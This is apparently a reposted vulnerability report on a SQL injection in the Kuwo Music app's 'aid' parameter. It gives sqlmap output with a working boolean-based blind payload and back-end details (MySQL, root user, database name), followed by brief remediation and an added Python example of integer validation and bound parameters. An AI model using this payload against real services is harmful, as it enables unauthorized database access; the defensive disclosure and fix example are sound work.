
A SQL injection vulnerability in the Kuwo Music app

程序员文章站 2022-06-26 10:33:29

  *****300&type=guid&_=1478935789&*****

  Injection point: aid


  sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:

  ---

  Parameter: aid (GET)

  Type: boolean-based blind

  Title: AND boolean-based blind - WHERE or HAVING clause

  Payload: aid=2078300) AND 2825=2825 AND (5697=5697&type=guid&_=1478935789pid=5901124&uid=21259663

  ---

  web application technology: JSP

  back-end DBMS: MySQL >= 5.0.2

  current user: 'root@192.168.298.15'

  current database: 'MLOG'

  For verification only; please fix as soon as possible!

  Remediation:

  Parameter filtering
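An added example (not from the original report or the vendor's code) of what filtering has to mean for this finding: the reported payload contains no quotes, so quote escaping passes it through unchanged, while an integer allow-list plus a bound parameter rejects it. Python's sqlite3 stands in for the JSP/MySQL back end; the table, the query shape and all function names are assumptions.

```python
import sqlite3

# Value of the aid parameter, copied from the sqlmap payload above.
PAGE_PAYLOAD = "2078300) AND 2825=2825 AND (5697=5697"

def make_db():
    """Constructed stand-in table; the real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE album (aid INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO album VALUES (2078300, 'constructed row')")
    return db

def lookup_concat(db, aid):
    """Vulnerable shape (assumed): aid concatenated inside parentheses."""
    sql = "SELECT title FROM album WHERE (aid = " + aid + ")"
    return [row[0] for row in db.execute(sql)]

def escape_quotes(raw):
    """Weak 'filtering': doubles single quotes, which this payload never uses."""
    return raw.replace("'", "''")

def parse_aid(raw):
    """Allow-list filtering: ASCII decimal digits only, bounded length."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 18):
        raise ValueError("aid must be a decimal integer")
    return int(raw)

def lookup_bound(db, aid):
    """Hardened: validate first, then bind the value as a parameter."""
    cur = db.execute("SELECT title FROM album WHERE (aid = ?)", (parse_aid(aid),))
    return [row[0] for row in cur]

if __name__ == "__main__":
    db = make_db()
    # Quote escaping leaves the payload untouched, so the injected AND clause runs.
    print(lookup_concat(db, escape_quotes(PAGE_PAYLOAD)))
    print(lookup_bound(db, "2078300"))
    try:
        lookup_bound(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

In the JSP back end the equivalent is parsing `aid` as an integer and passing it through a `PreparedStatement` placeholder instead of building the SQL string.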